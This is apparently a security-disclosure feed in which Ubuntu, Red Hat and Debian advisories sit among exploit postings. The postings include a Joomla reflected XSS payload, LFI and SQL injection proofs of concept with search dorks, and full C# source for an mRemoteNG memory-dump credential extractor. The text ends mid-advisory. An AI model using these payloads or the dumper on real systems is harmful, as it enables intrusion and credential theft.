Ubuntu Security Notice 6261-1 - It was discovered that the IP-VLAN network driver for the Linux kernel did not properly initialize memory in some situations, leading to an out-of- bounds write vulnerability. An attacker could use this to cause a denial of service or possibly execute arbitrary code. Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation in the Ubuntu Linux kernel did not properly perform permission checks in certain situations. A local attacker could possibly use this to gain elevated privileges.

    ==========================================================================Ubuntu Security Notice USN-6261-1July 28, 2023linux-iot vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-iot: Linux kernel for IoT platformsDetails:It was discovered that the IP-VLAN network driver for the Linux kernel didnot properly initialize memory in some situations, leading to an out-of-bounds write vulnerability. An attacker could use this to cause a denial ofservice (system crash) or possibly execute arbitrary code. (CVE-2023-3090)Shir Tamari and Sagi Tzadik discovered that the OverlayFS implementation inthe Ubuntu Linux kernel did not properly perform permission checks incertain situations. A local attacker could possibly use this to gainelevated privileges. (CVE-2023-32629)It was discovered that the netfilter subsystem in the Linux kernel did notproperly handle some error conditions, leading to a use-after-freevulnerability. A local attacker could use this to cause a denial of service(system crash) or possibly execute arbitrary code. (CVE-2023-3390)Tanguy Dubroca discovered that the netfilter subsystem in the Linux kerneldid not properly handle certain pointer data type, leading to an out-of-bounds write vulnerability. A privileged attacker could use this to cause adenial of service (system crash) or possibly execute arbitrary code.(CVE-2023-35001)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   linux-image-5.4.0-1018-iot      5.4.0-1018.19After a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:   https://ubuntu.com/security/notices/USN-6261-1   CVE-2023-3090, CVE-2023-32629, CVE-2023-3390, CVE-2023-35001Package Information:   https://launchpad.net/ubuntu/+source/linux-iot/5.4.0-1018.19

Ubuntu Security Notice USN-6261-1

Joomla iProperty Real Estate extension version 4.1.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS# Exploit Author: CraCkEr# Date: 29/07/2023# Vendor: The Thinkery LLC# Vendor Homepage: http://thethinkery.net# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/# Demo: https://iproperty.thethinkery.net/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site ## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /iproperty/property-views/all-properties-with-mapGET parameter 'filter_keyword' is vulnerable to XSShttps://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4[-] Done

Joomla iProperty Real Estate 4.1.1 Cross Site Scripting

Red Hat Security Advisory 2023-4330-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs:18 security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4330-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4330  
Issue date:        2023-07-31  
CVE Names:         CVE-2023-30581 CVE-2023-30588 CVE-2023-30589   
                   CVE-2023-30590   
=====================================================================

1. Summary:

An update for the nodejs:18 module is now available for Red Hat Enterprise  
Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

Node.js is a software development platform for building fast and scalable  
network applications in the JavaScript programming language.

The package has been upgraded to a later upstream version: nodejs (18).  
(BZ#2223314, BZ#2223316, BZ#2223318, BZ#2223319, BZ#2223320, BZ#2223354)

Security Fix(es):

* nodejs: mainModule.proto bypass experimental policy mechanism  
(CVE-2023-30581)

* nodejs: process interuption due to invalid Public Key information in x509  
certificates (CVE-2023-30588)

* nodejs: HTTP Request Smuggling via Empty headers separated by CR  
(CVE-2023-30589)

* nodejs: DiffieHellman do not generate keys after setting a private key  
(CVE-2023-30590)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2219824 - CVE-2023-30581 nodejs: mainModule.proto bypass experimental policy mechanism  
2219838 - CVE-2023-30588 nodejs: process interuption due to invalid Public Key information in x509 certificates  
2219841 - CVE-2023-30589 nodejs: HTTP Request Smuggling via Empty headers separated by CR  
2219842 - CVE-2023-30590 nodejs: DiffieHellman do not generate keys after setting a private key  
2223320 - nodejs:18/nodejs: Remove /usr/etc/npmrc softlink. [rhel-9] [rhel-9.2.0.z]

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
nodejs-18.16.1-1.module+el9.2.0.z+19424+78951f07.src.rpm  
nodejs-nodemon-2.0.20-2.module+el9.2.0.z+18497+a402347c.src.rpm  
nodejs-packaging-2021.06-4.module+el9.1.0+15718+e52ec601.src.rpm

aarch64:  
nodejs-18.16.1-1.module+el9.2.0.z+19424+78951f07.aarch64.rpm  
nodejs-debuginfo-18.16.1-1.module+el9.2.0.z+19424+78951f07.aarch64.rpm  
nodejs-debugsource-18.16.1-1.module+el9.2.0.z+19424+78951f07.aarch64.rpm  
nodejs-devel-18.16.1-1.module+el9.2.0.z+19424+78951f07.aarch64.rpm  
nodejs-full-i18n-18.16.1-1.module+el9.2.0.z+19424+78951f07.aarch64.rpm  
npm-9.5.1-1.18.16.1.1.module+el9.2.0.z+19424+78951f07.aarch64.rpm

noarch:  
nodejs-docs-18.16.1-1.module+el9.2.0.z+19424+78951f07.noarch.rpm  
nodejs-nodemon-2.0.20-2.module+el9.2.0.z+18497+a402347c.noarch.rpm  
nodejs-packaging-2021.06-4.module+el9.1.0+15718+e52ec601.noarch.rpm  
nodejs-packaging-bundler-2021.06-4.module+el9.1.0+15718+e52ec601.noarch.rpm

ppc64le:  
nodejs-18.16.1-1.module+el9.2.0.z+19424+78951f07.ppc64le.rpm  
nodejs-debuginfo-18.16.1-1.module+el9.2.0.z+19424+78951f07.ppc64le.rpm  
nodejs-debugsource-18.16.1-1.module+el9.2.0.z+19424+78951f07.ppc64le.rpm  
nodejs-devel-18.16.1-1.module+el9.2.0.z+19424+78951f07.ppc64le.rpm  
nodejs-full-i18n-18.16.1-1.module+el9.2.0.z+19424+78951f07.ppc64le.rpm  
npm-9.5.1-1.18.16.1.1.module+el9.2.0.z+19424+78951f07.ppc64le.rpm

s390x:  
nodejs-18.16.1-1.module+el9.2.0.z+19424+78951f07.s390x.rpm  
nodejs-debuginfo-18.16.1-1.module+el9.2.0.z+19424+78951f07.s390x.rpm  
nodejs-debugsource-18.16.1-1.module+el9.2.0.z+19424+78951f07.s390x.rpm  
nodejs-devel-18.16.1-1.module+el9.2.0.z+19424+78951f07.s390x.rpm  
nodejs-full-i18n-18.16.1-1.module+el9.2.0.z+19424+78951f07.s390x.rpm  
npm-9.5.1-1.18.16.1.1.module+el9.2.0.z+19424+78951f07.s390x.rpm

x86_64:  
nodejs-18.16.1-1.module+el9.2.0.z+19424+78951f07.x86_64.rpm  
nodejs-debuginfo-18.16.1-1.module+el9.2.0.z+19424+78951f07.x86_64.rpm  
nodejs-debugsource-18.16.1-1.module+el9.2.0.z+19424+78951f07.x86_64.rpm  
nodejs-devel-18.16.1-1.module+el9.2.0.z+19424+78951f07.x86_64.rpm  
nodejs-full-i18n-18.16.1-1.module+el9.2.0.z+19424+78951f07.x86_64.rpm  
npm-9.5.1-1.18.16.1.1.module+el9.2.0.z+19424+78951f07.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-30581  
https://access.redhat.com/security/cve/CVE-2023-30588  
https://access.redhat.com/security/cve/CVE-2023-30589  
https://access.redhat.com/security/cve/CVE-2023-30590  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkx8M4AAoJENzjgjWX9erEoSIP/j4d1OLyPMaW+WXQ8DIAIEyw  
9eoGF848liFvv8vEyOidaapWgTwM6Fv7voipKA+cKTdlaYDPVpC1C6OQpgJbICGE  
I9ASFSufFqfyxkcST6nsUw2c7vkD8hE6wLgJUt1OcuPoudLnhxJKMB6a3tsxkQGx  
A4iCH9xNH6jgJ8jXFpp7DZxUe5EBNU9b+3UfhX5Jm7WPStUZQUyTs3Gc6Q3H6sc8  
8YXa8UqscqDYjjj0kEkWP7a5J3LfrQrgxU9AUbKrUlg50arGGH/vqjuXPbRhPett  
dB0arbp5reeBM3mXGGHPzxPK094GGsHEGIigLWOuiTVnzxr/y4pNQ5L8faVgC3E1  
2ti8rA0DHr5+ykCp+lcGNBZLot9HSj2CdKAtsjFGuGtL9QmTK7vdQ5p4lj0F8TLE  
2o5YbA6CA0W0Jw3e8Cqp9bY+eZh6eXTcrmCW5+1AFSBV6LUZnIzLc2eko/2xRDNu  
gIiQ/p3uIfV7NyvevacGbfS/z6yxnjDUu2lRPv4IKIgX4pwVh/D0xzVuXtjNPax3  
1eZ8fnwk3mpGkIbHTR2blk1P6ObXblTz/8Nl91wIFOj0W0fQ1ltzksVcXC3jzWOa  
da38nBWGPNh+V64Baml2NBZ3/axKf6NY3wCSEMFnFnrh9vHsb+sUatdIMXMeTSf/  
HebQn8WWp67DtawJbpmP  
=iEQ4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4330-01

Red Hat Security Advisory 2023-4332-01 - An update for bind is now available for Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4 Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important.

Red Hat Security Advisory 2023-4332-01

Red Hat Security Advisory 2023-4326-01 - Iperf is a tool which can measure maximum TCP bandwidth and tune various parameters and UDP characteristics. Iperf reports bandwidth, delay jitter, and data-gram loss.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: iperf3 security update  
Advisory ID:       RHSA-2023:4326-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4326  
Issue date:        2023-07-31  
CVE Names:         CVE-2023-38403   
=====================================================================

1. Summary:

An update for iperf3 is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

Iperf is a tool which can measure maximum TCP bandwidth and tune various  
parameters and UDP characteristics. Iperf reports bandwidth, delay jitter,  
and data-gram loss.

Security Fix(es):

* iperf3: memory allocation hazard and crash (CVE-2023-38403)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2222204 - CVE-2023-38403 iperf3: memory allocation hazard and crash

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

ppc64:  
iperf3-3.1.7-3.el7_9.ppc.rpm  
iperf3-3.1.7-3.el7_9.ppc64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64.rpm

ppc64le:  
iperf3-3.1.7-3.el7_9.ppc64le.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64le.rpm

s390x:  
iperf3-3.1.7-3.el7_9.s390.rpm  
iperf3-3.1.7-3.el7_9.s390x.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.s390.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.s390x.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:  
iperf3-debuginfo-3.1.7-3.el7_9.ppc.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64.rpm  
iperf3-devel-3.1.7-3.el7_9.ppc.rpm  
iperf3-devel-3.1.7-3.el7_9.ppc64.rpm

ppc64le:  
iperf3-debuginfo-3.1.7-3.el7_9.ppc64le.rpm  
iperf3-devel-3.1.7-3.el7_9.ppc64le.rpm

s390x:  
iperf3-debuginfo-3.1.7-3.el7_9.s390.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.s390x.rpm  
iperf3-devel-3.1.7-3.el7_9.s390.rpm  
iperf3-devel-3.1.7-3.el7_9.s390x.rpm

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
iperf3-3.1.7-3.el7_9.src.rpm

x86_64:  
iperf3-3.1.7-3.el7_9.i686.rpm  
iperf3-3.1.7-3.el7_9.x86_64.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
iperf3-debuginfo-3.1.7-3.el7_9.i686.rpm  
iperf3-debuginfo-3.1.7-3.el7_9.x86_64.rpm  
iperf3-devel-3.1.7-3.el7_9.i686.rpm  
iperf3-devel-3.1.7-3.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-38403  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJkx8MuAAoJENzjgjWX9erEYj0P/2d3G7A9E7QLj4oT0Fvj3bKi  
fFUWHgq1yWILwZEZ2TYzCdi3BtK8YLLlg8CnkM7ruhY8rxKoi2VQPB26tieDgHUl  
uqxsfcqPhEJgmC1L07elC5Dj1fuifRktUjtqTMA4dO/Dntu4nLYKXKY3rNHMmrLt  
8mxyt1CirycnZWpSt4borBuzXEwhUme4joqERXj/IZ/0gqlUDRg1Lkc7Yj8hehH7  
Jv4Gzmb2PyiJekwnVXt+z0XSQDtg3RHUkytA8UL6YIg8XTX4s24XDmEhlj9gxELM  
JsXDaIWBG9RWQ1xDB3INSmPyF6DQN3d8MxGeioppkOPO2JvgyZcKmL5nfIq8ndPu  
JnecwpiED0cXSlXl8Hk1Rbpev4v0QAf8bvBXJlzDK5yT3NnINL8Rqe0E2yzLb0Gf  
3uVfk88W/QMWtf+MG7xfH8z7AVhMugAiJI4Co0pZNphIJypOKvVNJJ/oMtMlaGsE  
aXyr8MkT3IP903j9vhP9DB+rb2v+rbow1WsTIMYKHrFGUltnE4Lv8YNtZzot+LAv  
AZZ9Q+Kw3TvKs840PV25EjuSuLoZ8BbZnGv42vNSNKSK93IlDxoTDZWe5oU9W49D  
QGueQ6ZMNMU/G+bJichIsq0+VbkrxSaN+PsuWfSLnxGkr7FUpL7+l7olzgOpEd1o  
raizshf5Qy5u40DuAJNB  
=7C45  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4326-01

Codecanyon Bitcoin Tools Suite version 1.0 suffers from a local file inclusion vulnerability.

    ========================================================================================================| # Title     : Codecanyon Bitcoin Tools Suite v1.0 LFI Vulnerability                                  || # Author    : indoushka                                                                              || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                | | # Vendor    : http://nitrogfx.com/74316-codecanyon-bitcoin-tools-suite-v10-50-features-20003097.html |  | # Dork      : "Powerful bitcoin and cryptocurrency tools & tickers."                                 |========================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] infected file : index.php    line 4 : require_once('includes/templates/' . $website['template'] . '/header.php');[+] http://localhost/btcon/index.php?website['template'] = evilGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Codecanyon Bitcoin Tools Suite 1.0 Local File Inclusion

CMVC SHOP LMS version 2.1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : CMVC SHOP LMS v 2.1.0 Sql injection Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 74.0(32-bit)                                               | | # Vendor    : http://www.cmvcshop.com/                                                                                           |  | # Dork      : All rights reserved CMVC SHOP                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/cmvcshopcom/product_detail.php?productid=%Inject_Here%106[+] http://127.0.0.1/wwwcmvcshopcom/login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMVC SHOP LMS 2.1.0 SQL Injection

mRemoteNG version 1.77.3.1784-NB exploit that extracts sensitive information that is stored in memory in the clear but encrypted at rest.

    # Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory# Google Dork: -# Date: 21.07.2023# Exploit Author: Maximilian Barz# Vendor Homepage: https://mremoteng.org/# Software Link: https://mremoteng.org/download# Version: mRemoteNG <= v1.77.3.1784-NB# Tested on: Windows 11# CVE : CVE-2023-30367/*Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users tostore and manage multi-protocol connection configurations to remotely connect to systems.mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-devloads configuration files in plain text into memory (after decrypting them if necessary) at application start-up,even if no connection has been established yet. This allows attackers to access contents of configuration files in plain textthrough a memory dump and thus compromise user credentials when no custom password encryption key has been set.This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper*/using System;using System.Collections;using System.Collections.Generic;using System.Diagnostics;using System.IO;using System.Reflection;using System.Runtime.InteropServices;using System.Text;using System.Text.RegularExpressions;namespace mRemoteNGDumper{public static class Program{public enum MINIDUMP_TYPE{MiniDumpWithFullMemory = 0x00000002}[StructLayout(LayoutKind.Sequential, Pack = 4)]public struct MINIDUMP_EXCEPTION_INFORMATION{public uint ThreadId;public IntPtr ExceptionPointers;public int ClientPointers;}[DllImport("kernel32.dll")]static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);[DllImport("Dbghelp.dll")]static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam);static void Main(string[] args){string input;bool configfound = false;StringBuilder filesb;StringBuilder linesb;List<string> configs = new List<string>();Process[] localByName = Process.GetProcessesByName("mRemoteNG");if (localByName.Length == 0) {Console.WriteLine("[-] No mRemoteNG process was found. Exiting");System.Environment.Exit(1);}string assemblyPath = Assembly.GetEntryAssembly().Location;Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id);string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp";FileStream procdumpFileStream = File.Create(dumpFileName);MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION();// A full memory dump is necessary in the case of a managed application, other wise no information// regarding the managed code will be availableMINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory;MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero);procdumpFileStream.Close();filesb = new StringBuilder();Console.WriteLine("[+] Searching for configuration files in memory dump.");using (StreamReader reader = new StreamReader(dumpFileName)){while (reader.Peek() >= 0){input = reader.ReadLine();string pattern = @"(\<Node)(.*)(?=\/>)\/>";Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase);if (m.Success){configfound = true;foreach (string config in m.Value.Split('>')){configs.Add(config);}}}reader.Close();if (configfound){string currentDir = System.IO.Directory.GetCurrentDirectory();string dumpdir = currentDir + "/dump";if (!Directory.Exists(dumpdir)){Directory.CreateDirectory(dumpdir);}string savefilepath;for (int i =0; i < configs.Count;i++){if (!string.IsNullOrEmpty(configs[i])){savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml";Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath);using (StreamWriter writer = new StreamWriter(savefilepath)){writer.Write(configs[i]+'>');writer.Close();}}}Console.WriteLine("[+] Done!");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" );}else{Console.WriteLine("[-] No configuration file found in memorydump. Exiting");Console.WriteLine("[+] Deleting memorydump file!");File.Delete(dumpFileName);}}}}}

mRemoteNG 1.77.3.1784-NB Sensitive Information Extraction

Debian Linux Security Advisory 5461-1 - Several vulnerabilities have been discovered in the Linux kernel that may lead to a privilege escalation, denial of service or information leaks.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5461-1                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 30, 2023                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : linux  
CVE ID         : CVE-2023-3390 CVE-2023-3610 CVE-2023-20593

Several vulnerabilities have been discovered in the Linux kernel that  
may lead to a privilege escalation, denial of service or information  
leaks.

CVE-2023-3390

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    error path handling may result in denial of service or privilege  
    escalation.

CVE-2023-3610

    A use-after-free flaw in the netfilter subsystem caused by incorrect  
    refcount handling on the table and chain destroy path may result in  
    denial of service or privilege escalation.

CVE-2023-20593

    Tavis Ormandy discovered that under specific microarchitectural  
    circumstances, a vector register in AMD "Zen 2" CPUs may not be  
    written to 0 correctly.  This flaw allows an attacker to leak  
    sensitive information across concurrent processes, hyper threads  
    and virtualized guests.

    For details please refer to  
    <https://lock.cmpxchg8b.com/zenbleed.html> and  
    <https://github.com/google/security-research/security/advisories/GHSA-v6wh-rxpg-cmm8>.

    This issue can also be mitigated by a microcode update through the  
    amd64-microcode package or a system firmware (BIOS/UEFI) update.  
    However, the initial microcode release by AMD only provides  
    updates for second generation EPYC CPUs.  Various Ryzen CPUs are  
    also affected, but no updates are available yet.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.10.179-3.

We recommend that you upgrade your linux packages.

For the detailed security status of linux please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/linux

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmTGCxhfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0Q2Lw//W7eGT2uTxzgwGK1ivLNtzu4VnZfX3luCzLc2Gy49YhSTPfepMsR+EZWU  
zMfxMwXp7HcgUUAj6VnKPSYt0lmauDVy9POUl20nOzM8hFScemhFJ+DVSeeJrfhR  
RPUroaJNLpJS1QjYJisi2tjKnoc8IhCkw/X88I4S4dAzekmRTLeEdeAIP0jyRYDi  
Pd+nW8vR2bcMG4jAaA/lBu17FgysEpHMleMzr9Ocw7k6eqlcIo12w36Ml51MmXZW  
Lxr7XKrAM6p9TuL+BY0i4FvW0f7hvbpMdhIaAzUf+7LQj9Tn5rGNaHB+NhLO6HB1  
spOXfZLVCM10LDCDIUR3lz0hUNI/10bKtoarbvoygevVzuvGWLTmI5P/uei9Bv1m  
jqd+FOtkZuYsuQzvzIrVISGL2ltpD3055mBaOJWIBrDl+mrR88m+LAMA5iJiCuvh  
M6rfJgraQFHeMFJi1ojDgNyyRaasxOKXRcWAYOvgZ1XKLfJ10OkieYq5CO1c7iKW  
4NkwBklDP8wEHoZHMEY3KnLnGcNO93wBBGcQVIBlMXu0IKlf/BT0Rcj0ynz5g5N1  
MgvGAJio+yTr4QWRz/GQRtF3Lf5r4Ezib/Y2Qv9PUbVWzmmiUyQsATjcp9d+sLSB  
hJhR9+9d4DefRAPGFOSCA6d01qL8HygsvKyyGB4C1DdbSlT3APc=  
=3UcB  
-----END PGP SIGNATURE-----

Debian Security Advisory 5461-1

Red Hat Security Advisory 2023-4331-01 - Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. Issues addressed include HTTP request smuggling and bypass vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: nodejs security, bug fix, and enhancement update  
Advisory ID:       RHSA-2023:4331-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4331  
Issue date:        2023-07-31  
